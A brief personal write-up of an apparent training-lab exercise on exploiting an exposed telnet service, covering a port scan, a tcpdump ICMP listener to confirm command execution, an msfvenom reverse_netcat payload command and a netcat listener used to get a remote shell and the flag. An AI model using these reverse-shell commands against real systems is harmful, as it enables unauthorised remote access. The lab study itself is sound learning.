31 Dec 2022
Same process as with SMB, start with a port scan.
Answered the questions
Since I always forget,
CVE - Common Vulnerabilities and Exposures
Even though CVEs exist for telnet, still far more likely to find a misconfiguration to exploit.
Try connecting to system scanned in previous task.
Need to use a listener, can use tcpdump with sudo tcpdump ip proto \\icmp -i eth0 to start a tcpdump listner listening for icmp traffic. Only use eth0 for Atackbox, use tun0 for vpn connection. Initiate a ping on remote session using .RUN ping [ip address] -c 1 where ip address is the local machine to see if can send commands to remote session, and if connected all the way back.
Create a reverse shell with msfvenom -p cmd/unix/reverse_netcat lhost=[local ip] lport=4444 R where:
Start netcat listener with nc -lvp 4444. Once connected, can run commands through listener.
Answered all questions and got the flag.